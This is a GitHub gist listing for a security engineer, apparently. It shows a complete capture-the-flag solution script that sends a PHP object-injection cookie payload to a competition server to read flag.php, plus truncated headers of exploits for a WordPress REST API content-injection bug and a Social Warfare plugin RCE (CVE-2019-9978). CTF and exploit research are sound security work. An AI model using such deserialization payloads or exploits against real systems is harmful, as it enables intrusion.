Ida Bagus Budanthara budanthara

🏠

Working from home

Security Engineer guy

budanthara / web1_tumctf.py

Created October 2, 2016 16:21

	import requests
	import re
	from urllib import quote_plus

	def main():
	cookie = quote_plus('760463360e4919ca238d1566fc26661fa:1:{i:0;O:16:"GPLSourceBloater":1:{s:6:"source";s:8:"flag.php";}}')
	url = "http://104.154.70.126:10888/"
	req = requests.get(url, cookies=dict(todos=cookie))
	print 'hxp{'+' '.join(re.findall(r'hxp{(.*?)}', req.text)[0].split(" "))+'}'

budanthara / wordpress_content_injection.py

Last active July 8, 2024 14:42

Wordpress content injection exploit by snoww0lf

	#! /usr/bin/env python

	"""
	Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
	REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
	Wordpress Version Affected: 4.7.0/4.7.1

	2017 - Coded by snoww0lf.
	"""
	import re

budanthara / CVE-2019-9978.py

Created May 12, 2019 07:21

	# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 )
	# Date: March, 2019
	# Researcher: Luka Sikic
	# Exploit Author: hash3liZer
	# Download Link: https://wordpress.org/plugins/social-warfare/
	# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
	# Github: https://github.com/hash3liZer/CVE-2019-9978
	# Version: <=3D 3.5.2
	# CVE: CVE-2019-9978

budanthara / saml.jpg

Created April 4, 2020 21:34

saml